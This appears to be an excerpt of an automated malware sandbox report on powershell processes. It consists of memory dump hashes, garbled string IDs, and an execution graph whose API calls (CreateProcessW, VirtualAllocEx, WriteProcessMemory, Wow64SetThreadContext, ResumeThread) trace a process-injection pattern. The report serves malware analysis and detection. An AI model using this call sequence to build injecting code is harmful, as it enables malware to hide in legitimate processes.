                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$$q$$q
                                                                                                            • API String ID: 0-3199993180
                                                                                                            • Opcode ID: b3087ed6490ecd1ffc999f06b4dc055c5ed1a89ae4e7cf999082168b5774d367
                                                                                                            • Instruction ID: ccb4ea5616304b104eac97ebce9e5003852f80a6e1da2dafc04dc758039efd70
                                                                                                            • Opcode Fuzzy Hash: b3087ed6490ecd1ffc999f06b4dc055c5ed1a89ae4e7cf999082168b5774d367
                                                                                                            • Instruction Fuzzy Hash: 7F018450B0D3978FE72693646C202659FB26F83550B2F81DBD5C1EB293CD658C06C3A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1303816078.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_52c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 72870c7eadcf1b9610454ed7506abae3a77598b4f57f3176ab8de9ce63cb4fb9
                                                                                                            • Instruction ID: d63b5580fcb8ab4071d726f4e33991f563a1ad62bbd3db55c67b785166005e3b
                                                                                                            • Opcode Fuzzy Hash: 72870c7eadcf1b9610454ed7506abae3a77598b4f57f3176ab8de9ce63cb4fb9
                                                                                                            • Instruction Fuzzy Hash: 9C518B75D1E3D15FDB13EB68997069ABFB0AF46101B0A42CBC084CF2A3D624990DC7E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1303816078.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_52c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 05f403179f13fdef2e0d3f3a2c776cc69283f4c9907491a6958e21f9e5b001a4
                                                                                                            • Instruction ID: 1f286ddaa5273fcf9c6c4321e5b8b2675da70ee5736d256e118186b890419454
                                                                                                            • Opcode Fuzzy Hash: 05f403179f13fdef2e0d3f3a2c776cc69283f4c9907491a6958e21f9e5b001a4
                                                                                                            • Instruction Fuzzy Hash: 36417C78A00205DFCB05CF58C498EAAFBB5FF48310B1182A9D8559B365CB36FC91CBA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1303816078.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_52c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3747dc2a4fad8d572449227fd552e05db806e3644313446dedd92068309e7061
                                                                                                            • Instruction ID: 13b6e70ad0f0c9319545c4c885f76f94842dfcc12e84b5207d1314ac3e87ffec
                                                                                                            • Opcode Fuzzy Hash: 3747dc2a4fad8d572449227fd552e05db806e3644313446dedd92068309e7061
                                                                                                            • Instruction Fuzzy Hash: 7C11F675A006099FCB00DF99D490AAEFBB5FF89310B158599E919EB362C731ED41CBA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1303277078.000000000362D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0362D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_362d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1dee16191aed047d8185b6c29b86db3e7e9d5c3759ecd8a00fde371555c46b60
                                                                                                            • Instruction ID: ac6d74fbfeb1a0a07cb93333ada4ad184f699631eb34962cf53ec83eceef22e3
                                                                                                            • Opcode Fuzzy Hash: 1dee16191aed047d8185b6c29b86db3e7e9d5c3759ecd8a00fde371555c46b60
                                                                                                            • Instruction Fuzzy Hash: 0701697200D3D09FD7128B268D94752BFA8DF43224F0984DBE8988F2A3C2689C45CB72
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1308791175.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7df0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4546d90e9fc666aa8553a169f1755fefad493f401fbe0dd20cdb61d0445b3e07
                                                                                                            • Instruction ID: d39a5089529a398a2036b8b63c7ddfe87dc3e0bd67c4076dba2401b14ebf8885
                                                                                                            • Opcode Fuzzy Hash: 4546d90e9fc666aa8553a169f1755fefad493f401fbe0dd20cdb61d0445b3e07
                                                                                                            • Instruction Fuzzy Hash: F8012BB1F043245BF22966685C11B7EAB229BC0514B4A40BECB015F286CE368D0243DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1303277078.000000000362D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0362D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_362d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0e0e40c184b247aa6c56c703393ee68af7996b7deb8707c35e33fac353f0db82
                                                                                                            • Instruction ID: 6c188b32b737dcd3c470d4e3b17699113a0cc4c9e0ebece5355b907003c8b55f
                                                                                                            • Opcode Fuzzy Hash: 0e0e40c184b247aa6c56c703393ee68af7996b7deb8707c35e33fac353f0db82
                                                                                                            • Instruction Fuzzy Hash: 9301F231508710AEE7208F22CD84B66FF98DF41265F08C45AEC684F292C2799886CEB6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1308791175.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7df0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: tPq$tPq$$q$$q$$q$Gj$Gj
                                                                                                            • API String ID: 0-176468219
                                                                                                            • Opcode ID: 554c940db9e447d6879a6b47bd5ef3b99ef886b3e3b8c3ccd76e5ecb7f4daa53
                                                                                                            • Instruction ID: bf3f06c9802532ac3d8a3b9b7018928ff20bd458288c0257d011e102512ecea7
                                                                                                            • Opcode Fuzzy Hash: 554c940db9e447d6879a6b47bd5ef3b99ef886b3e3b8c3ccd76e5ecb7f4daa53
                                                                                                            • Instruction Fuzzy Hash: 41515E767043568FD7248A69A810676FBA5EFC5221F2A80ABDA85CB353DA31DC41C7A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1308791175.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7df0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $q$$q$$q$Gj$Gj
                                                                                                            • API String ID: 0-337631293
                                                                                                            • Opcode ID: 0d1873550f458b5408de482e56ad8a527f774201c88ceb24bb0b8d39471c8fa2
                                                                                                            • Instruction ID: 546a6ca852a575a3de4808014c4aae98b0edfa632a01ddd93084e21c59834191
                                                                                                            • Opcode Fuzzy Hash: 0d1873550f458b5408de482e56ad8a527f774201c88ceb24bb0b8d39471c8fa2
                                                                                                            • Instruction Fuzzy Hash: 20110B7570070FD7EB34566A9801767F7A6EBC5361F29C52AEA4987380CA73D841C770
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1308791175.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7df0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $q$$q$$q$$q
                                                                                                            • API String ID: 0-4102054182
                                                                                                            • Opcode ID: 13f32eccf141f34aaf9b9b2e4eceb26af6e666948806e48e6a75acd5d2b758d0
                                                                                                            • Instruction ID: 05c4326fbd4f28ac730137273c0730f27db0004146d4933a481910bfd234833c
                                                                                                            • Opcode Fuzzy Hash: 13f32eccf141f34aaf9b9b2e4eceb26af6e666948806e48e6a75acd5d2b758d0
                                                                                                            • Instruction Fuzzy Hash: 272108F17143065BE738666AAC11B27FBE69FC5715F27803AEB45CB281DD32D8418361
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1308791175.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7df0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $q$$q$$q$$q
                                                                                                            • API String ID: 0-4102054182
                                                                                                            • Opcode ID: 1c3d562c7134f5786d3ddccfcb1685284e72d7e75dd699fc1c3124a65b73d13b
                                                                                                            • Instruction ID: b14608321ce7146b22db0c98f096dd7926883b3897760d583a7d310dadf05009
                                                                                                            • Opcode Fuzzy Hash: 1c3d562c7134f5786d3ddccfcb1685284e72d7e75dd699fc1c3124a65b73d13b
                                                                                                            • Instruction Fuzzy Hash: 47214BF13103056BE634662AAC11B77FBEA9FC5315F27803AEB0587381DD31C8428361
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1308791175.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7df0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$$q$$q
                                                                                                            • API String ID: 0-3199993180
                                                                                                            • Opcode ID: b649e548703411f1ab2c23b2550fc82fce861dbbf8453979670a9b1608f61b29
                                                                                                            • Instruction ID: f8a6ee74585836b6eb803b72b10648c10511321e9437fbe81d3cd49d22bfea59
                                                                                                            • Opcode Fuzzy Hash: b649e548703411f1ab2c23b2550fc82fce861dbbf8453979670a9b1608f61b29
                                                                                                            • Instruction Fuzzy Hash: 8F018452A0D3C34FD72752782820255AFB25F8352032F82DBC681CF297CA254D4687A3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2076719954.000000000346D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0346D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_346d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 69c4c3ae7ccebaeca608691358055069910654bb183b183d6c03c8e67d04467f
                                                                                                            • Instruction ID: 60073c67901ed8e344dd103d9f2825f5f02d3822d453857536409b2d00b1dd7b
                                                                                                            • Opcode Fuzzy Hash: 69c4c3ae7ccebaeca608691358055069910654bb183b183d6c03c8e67d04467f
                                                                                                            • Instruction Fuzzy Hash: BD01407250E3C09FD7128B258894B52BFB8DF43224F1D81DBD8888F2A3C2695849C772
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2076719954.000000000346D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0346D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_346d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 597cf239cb277bba7ba3854e8eb3a17ec3e84c317287c69fbffcf28e1db15286
                                                                                                            • Instruction ID: 0dbd5eb5112cd4007288676c7d4ed5436965f2dd37368f2cd9a1779109d375bd
                                                                                                            • Opcode Fuzzy Hash: 597cf239cb277bba7ba3854e8eb3a17ec3e84c317287c69fbffcf28e1db15286
                                                                                                            • Instruction Fuzzy Hash: 0B01FC31A047409EE7208E15CC84757FF9CDF42229F18C05BDC540F242C2789846CABB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2078193594.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_4f60000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24e6ec682b819a0659318316016eb9051c4e50e849177bcaf2c034ba1a094cc9
                                                                                                            • Instruction ID: 149f7e0a85f0b75cc1d9aaa047e811c18e54c76a98f1ecb17ba52cc8eb87e49b
                                                                                                            • Opcode Fuzzy Hash: 24e6ec682b819a0659318316016eb9051c4e50e849177bcaf2c034ba1a094cc9
                                                                                                            • Instruction Fuzzy Hash: 34F0D435A001099FDB15CF9DD990AEEF7B1FF88324F208159E525A72A1C736EC62CB60

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:5.7%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:38.7%
                                                                                                            Total number of Nodes:62
                                                                                                            Total number of Limit Nodes:5

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 0466AB5A
                                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 0466ABFC
                                                                                                              • Part of subcall function 04669418: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18732514,00000000,?,?,?,00000000,00000000,?,0466AC5F,?,00000000,?), ref: 0466B4D4
                                                                                                            • ResumeThread.KERNELBASE(?), ref: 0466AE7F
                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0466B1E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 4270437565-0
                                                                                                            • Opcode ID: 7e78eb22068423700849a1d3f6f396e6ecda54f54d81616c7a018d044570565b
                                                                                                            • Instruction ID: dec551aa8bf428654cf20b8029f891cb1cd42aa1a0f9d7cc79c1385a0547796c
                                                                                                            • Opcode Fuzzy Hash: 7e78eb22068423700849a1d3f6f396e6ecda54f54d81616c7a018d044570565b
                                                                                                            • Instruction Fuzzy Hash: BF42A170A00219DFEB24DFA5D854B9DB7F2AF85304F1481ADD90AA7390EB34AE85CF51

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xq$$q
                                                                                                            • API String ID: 0-855381642
                                                                                                            • Opcode ID: 3e8ef07e74d21ef8703b75a2c51dc66ed84e6ce7000721b90fa24ec2cbe556b6
                                                                                                            • Instruction ID: 50469d109414f9ff15a6e1cf8eb02082f81ad8b09c2ff1bc453654ef6d6e0a83
                                                                                                            • Opcode Fuzzy Hash: 3e8ef07e74d21ef8703b75a2c51dc66ed84e6ce7000721b90fa24ec2cbe556b6
                                                                                                            • Instruction Fuzzy Hash: 92E10430B092549FDB189BB9985467E7BB6FF86300F09846ED447E7385EE39AC038791
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (oq$(oq$4'q$4'q$4'q$4'q$4'q$4'q$$q$$q$$q
                                                                                                            • API String ID: 0-3026883538
                                                                                                            • Opcode ID: 97540173e06b747299862f00486955c0dd885e4845298da8aa2796de587f14a3
                                                                                                            • Instruction ID: a0266674e9992ac8d37970fea8c1d06b40af05189f3dd8148e53ddce432d0c24
                                                                                                            • Opcode Fuzzy Hash: 97540173e06b747299862f00486955c0dd885e4845298da8aa2796de587f14a3
                                                                                                            • Instruction Fuzzy Hash: 161213B0B0420ADFDF258B69D8447EABBA2FF85211F14C47BE8558B251DB36D842CB91

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                                                                                                            • API String ID: 0-4104424984
                                                                                                            • Opcode ID: de9141c877240e0ecbc29f1a85931fa527c2d5763777a03c13a13ec1fae7e5f8
                                                                                                            • Instruction ID: 066e386a142e852e3fbc1f0ad11339b1af2a87f6d0bb32696e889d2d67547d7f
                                                                                                            • Opcode Fuzzy Hash: de9141c877240e0ecbc29f1a85931fa527c2d5763777a03c13a13ec1fae7e5f8
                                                                                                            • Instruction Fuzzy Hash: C4B108B5B0430AFFDF259A6998107FABBE6BF85211F14847BD809CB241DB35C942C7A1

                                                                                                            Control-flow Graph (basic blocks 75903e0-759085f, executed/not-executed colouring and graph rendering not reproduced; no API calls annotated)
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q
                                                                                                            • API String ID: 0-1721289453
                                                                                                            • Opcode ID: fac86270461bdb0e1c4fbb3681c06bfcd25741c631acd074e60d96153aec8314
                                                                                                            • Instruction ID: 5888a4226cce8703bf5a0ba8e63bafb930d93989c69df5636b9ed92f1243c211
                                                                                                            • Opcode Fuzzy Hash: fac86270461bdb0e1c4fbb3681c06bfcd25741c631acd074e60d96153aec8314
                                                                                                            • Instruction Fuzzy Hash: 89B106B5B002079FEF249A6598107EABBE5BF85215F24887BD84DCB2C1DB35D842C791

                                                                                                            Control-flow Graph (basic blocks 466a525-466b2a9, executed/not-executed colouring and graph rendering not reproduced; internal calls to 46693f4, 4669400, 466940c, 46685f4, 4669418, 4669424; annotated API calls: CreateProcessW, VirtualAllocEx, VirtualAllocEx, ResumeThread)
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: af94a7dbf6a9409c4eadebe38c28cc16bda151f81f30cb72ffae2dc01a2fec5f
                                                                                                            • Instruction ID: 9e9634e916be00f02f0afc5700e65592725cf13dc401afdef04360d7cb4318b1
                                                                                                            • Opcode Fuzzy Hash: af94a7dbf6a9409c4eadebe38c28cc16bda151f81f30cb72ffae2dc01a2fec5f
                                                                                                            • Instruction Fuzzy Hash: 84F16F70A00319CFEB24DFA5C854B99B7B6AF85304F1481ADE50AA7391EB70AE85CF51

                                                                                                            Control-flow Graph (basic blocks 75903c0-759085f, executed/not-executed colouring and graph rendering not reproduced; no API calls annotated)
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$$q$$q
                                                                                                            • API String ID: 0-3789935075
                                                                                                            • Opcode ID: ceecd9f5e0e37df63ef7a5fb09c65b94d76f9977a65b5adf35b48a8da9ae93ce
                                                                                                            • Instruction ID: 1c3631c88efde690f16cc0206cf51b730e8e97112091a1dc7417d64c177dd5a5
                                                                                                            • Opcode Fuzzy Hash: ceecd9f5e0e37df63ef7a5fb09c65b94d76f9977a65b5adf35b48a8da9ae93ce
                                                                                                            • Instruction Fuzzy Hash: 1B31FEF0A04203EFEF208A25A4107EA7BE5BF82214F158877D81CDB2C1EB39C980C765

                                                                                                            Control-flow Graph (basic blocks 75909fa-7590da5, executed/not-executed colouring and graph rendering not reproduced; no API calls annotated)
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1717998604.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_7590000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 84Oj$tPq
                                                                                                            • API String ID: 0-2098441693
                                                                                                            • Opcode ID: a955dc574f5deca820de9dcb7222775249545a81ba2eeb86d0882bb248210883
                                                                                                            • Instruction ID: 0282c35e66a279adb767299ce863262ad90961dd46a86329bb76212c016682df
                                                                                                            • Opcode Fuzzy Hash: a955dc574f5deca820de9dcb7222775249545a81ba2eeb86d0882bb248210883
                                                                                                            • Instruction Fuzzy Hash: 434119746093829FCB218B24C850B9ABFB1FF46214F1984EBD8489F2D3C631DC46C7A6

                                                                                                            Control-flow Graph (basic blocks 46693f4-466b2a9, executed/not-executed colouring and graph rendering not reproduced; annotated API call: CreateProcessW)
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0466B1E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 742c1d1b5b98d6a6afc252eb2ceffdff877ba0fcedabdf5720a76947d9c4d635
                                                                                                            • Instruction ID: 855fb6757f51d18e0fdc7392bb9772244371a6d20f84e090298fa0668f2bf476
                                                                                                            • Opcode Fuzzy Hash: 742c1d1b5b98d6a6afc252eb2ceffdff877ba0fcedabdf5720a76947d9c4d635
                                                                                                            • Instruction Fuzzy Hash: 7B512971D0122ADFDF24CF59C840BDDBBB5BB48710F1081AAE909B7254E771AA85CF50

                                                                                                            Control-flow Graph (basic blocks 4669418-466b50b, executed/not-executed colouring and graph rendering not reproduced; annotated API call: WriteProcessMemory)
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18732514,00000000,?,?,?,00000000,00000000,?,0466AC5F,?,00000000,?), ref: 0466B4D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 93cca46ddebee61a3e7702241752a3013bb635fd221e225c7cb139889f3a9b62
                                                                                                            • Instruction ID: 53a11a80cbccddcd36df53294b0f5253af2f9c57583617272b79363901289fbb
                                                                                                            • Opcode Fuzzy Hash: 93cca46ddebee61a3e7702241752a3013bb635fd221e225c7cb139889f3a9b62
                                                                                                            • Instruction Fuzzy Hash: FF21F5B1900359DFDB10DF9AD984BDEBBF4FB48320F108029E919A7200D378A944CFA5

                                                                                                            Control-flow Graph (basic blocks 466b450-466b50b, executed/not-executed colouring and graph rendering not reproduced; annotated API call: WriteProcessMemory)
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18732514,00000000,?,?,?,00000000,00000000,?,0466AC5F,?,00000000,?), ref: 0466B4D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 70281d06f929a9c7be0e13c3148cd435bf25a1ad5be1661938a90a3b0a5a97a9
                                                                                                            • Instruction ID: 8a5ab0865f73df1c8dc9add40fb06bd95361e4044231744268f8c9c7d310de87
                                                                                                            • Opcode Fuzzy Hash: 70281d06f929a9c7be0e13c3148cd435bf25a1ad5be1661938a90a3b0a5a97a9
                                                                                                            • Instruction Fuzzy Hash: 372123B1800359DFDB10CF9AC884BDEBBF4FB48320F10842AE918A7200D378A944CFA4

Control-flow Graph (rendered as an image on the page; basic blocks and edges recovered from the graph text):
• 466b2d9-466b320 -> 466b322-466b32a | 466b32c-466b358
• 466b322-466b32a -> 466b32c-466b358
• 466b32c-466b358 (Wow64SetThreadContext) -> 466b35a-466b360 | 466b361-466b382
• 466b35a-466b360 -> 466b361-466b382
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0466AA13), ref: 0466B34B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: ff5d90a15abf4c6044bad65efecf8578b95174c17096428ba30b147c1f985f6f
                                                                                                            • Instruction ID: 498d8519b3f0a062ae042d0c1bdb24e899395fa13c431dd7db2b58ee6197dd76
                                                                                                            • Opcode Fuzzy Hash: ff5d90a15abf4c6044bad65efecf8578b95174c17096428ba30b147c1f985f6f
                                                                                                            • Instruction Fuzzy Hash: 3A1114B2D00659CFDB20CF9AC885BDEFBF4EB88720F15842AD459A3200D738A545CFA5

Control-flow Graph (rendered as an image on the page; basic blocks and edges recovered from the graph text; alternate entry into the same Wow64SetThreadContext routine):
• 4669424-466b320 -> 466b322-466b32a | 466b32c-466b358
• 466b322-466b32a -> 466b32c-466b358
• 466b32c-466b358 (Wow64SetThreadContext) -> 466b35a-466b360 | 466b361-466b382
• 466b35a-466b360 -> 466b361-466b382
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0466AA13), ref: 0466B34B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.1671397174.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_4660000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 2212cc86ccc7c129de3288ec14e19bdc4c160e98c480e69f288904b7d90b372c
                                                                                                            • Instruction ID: 9390118e142fd9f8fb796889692d2b13fe0c1d67f008639acf48eda260ec74b5
                                                                                                            • Opcode Fuzzy Hash: 2212cc86ccc7c129de3288ec14e19bdc4c160e98c480e69f288904b7d90b372c
                                                                                                            • Instruction Fuzzy Hash: A81114B1D00659CFDB20CF9AD845BDEBBF4EB88720F548029D459A3200E778A545CFA5

Control-flow Graph (rendered as an image on the page; basic blocks and edges recovered from the graph text; alternate entry into the same Wow64SetThreadContext routine):
• 4669400-466b320 -> 466b322-466b32a | 466b32c-466b358
• 466b322-466b32a -> 466b32c-466b358
• 466b32c-466b358 (Wow64SetThreadContext) -> 466b35a-466b360 | 466b361-466b382
• 466b35a-466b360 -> 466b361-466b382
                                                                                                            APIs
